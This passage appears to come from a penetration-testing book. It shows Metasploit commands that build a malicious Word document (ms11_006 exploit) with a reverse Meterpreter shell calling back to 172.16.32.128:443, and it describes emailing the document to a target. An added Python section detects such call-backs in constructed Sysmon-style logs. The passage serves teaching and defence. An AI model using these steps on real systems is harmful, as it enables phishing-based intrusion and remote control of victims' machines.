120
Chapter 8
available. In the next example, you can see that the file format is exported as
a document:
msf > use windows/fileformat/ms11_006_createsizeddibsection
msf exploit(ms11_006_createsizeddibsection) > info
. . . SNIP . . .
Available targets:
Id Name
-- ----
0 Automatic
1 Windows 2000 SP0/SP4 English
2 Windows XP SP3 English
3 Crash Target for Debugging
Next, you can see that we have a few targets available to use, but we’ll
make it automatic and leave everything at the default settings:
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.doc yes The file name.
OUTPUTPATH /opt/metasploit3/msf3/data/exploits yes The location of the file.
We’ll need to set a payload as usual. In this case, we will select our first
choice, a reverse Meterpreter shell:
msf exploit(ms11_006_createsizeddibsection) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms11_006_createsizeddibsection) > set LHOST 172.16.32.128
LHOST => 172.16.32.128
msf exploit(ms11_006_createsizeddibsection) > set LPORT 443
LPORT => 443
msf exploit(ms11_006_createsizeddibsection) > exploit
[*] Creating 'msf.doc' file...
[*] Generated output file /opt/metasploit3/msf3/data/exploits/msf.doc
msf exploit(ms11_006_createsizeddibsection) >
Sending the Payload
Our file was exported as msf.doc and sent to the /opt/ directory within
Metasploit. Now that we have our malicious document, we can craft an
email to our target and hope the user opens it. At this point, we should
already have an idea of the target’s patch levels and vulnerabilities. Before
we actually open the document, we need to set up a multi-handler listener.
This will ensure that when the exploit is triggered, the attacker machine can
receive the connection back from the target machine (reverse payload).
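From the defender's side, the observable in the chain just described is the reverse connection itself: whatever process renders msf.doc on the target opens an outbound TCP session back to LHOST on port 443. The Python below is an added example, not code from the book or from Metasploit; it runs simple detection logic over constructed Sysmon Event ID 3-style records, and the document-handler process list, the internal address ranges and the destination allowlist are assumptions for the example.

```python
from ipaddress import ip_address, ip_network

# Constructed Sysmon Event ID 3 (NetworkConnect) style records, not real logs.
# The first one models the call-back the book's payload makes to LHOST:LPORT.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "Protocol": "tcp", "Initiated": True,
     "DestinationIp": "172.16.32.128", "DestinationPort": 443},
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "Protocol": "tcp", "Initiated": True,
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"Image": r"C:\Windows\explorer.exe",
     "Protocol": "tcp", "Initiated": False,
     "DestinationIp": "198.51.100.7", "DestinationPort": 49152},
    {"Image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "Protocol": "tcp", "Initiated": True,
     "DestinationIp": "203.0.113.20", "DestinationPort": 443},
]

# Assumed for this example: processes that open or preview documents, and the
# RFC 1918 ranges this organisation uses internally.
DOCUMENT_HANDLERS = {"winword.exe", "excel.exe", "powerpnt.exe",
                     "wordpad.exe", "explorer.exe"}
INTERNAL_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12",
                                         "192.168.0.0/16")]

def suspicious_callbacks(events, allow_dest=frozenset()):
    """Return the events in which a document-handling process initiated an
    outbound TCP connection to a destination not on the allowlist, each
    annotated with the reasons it was flagged."""
    hits = []
    for ev in events:
        image = ev["Image"].rsplit("\\", 1)[-1].lower()
        if image not in DOCUMENT_HANDLERS or not ev["Initiated"]:
            continue
        if ev["Protocol"] != "tcp" or ev["DestinationIp"] in allow_dest:
            continue
        reasons = [f"{image} initiated outbound tcp"]
        # reverse_tcp on 443 looks like HTTPS on the wire; a non-browser
        # process talking on 443 deserves a look rather than a pass.
        if ev["DestinationPort"] == 443:
            reasons.append("port 443 from a non-browser process")
        # An internal destination (the book's LHOST is 172.16.32.128) means
        # the handler sits inside the perimeter, not on a public update host.
        dst = ip_address(ev["DestinationIp"])
        if any(dst in net for net in INTERNAL_NETS):
            reasons.append("internal destination")
        hits.append({**ev, "reasons": reasons})
    return hits
```

Calling `suspicious_callbacks(SAMPLE_EVENTS, allow_dest={"203.0.113.20"})` on the constructed records flags only the WINWORD.EXE connection to 172.16.32.128:443, with all three reasons attached.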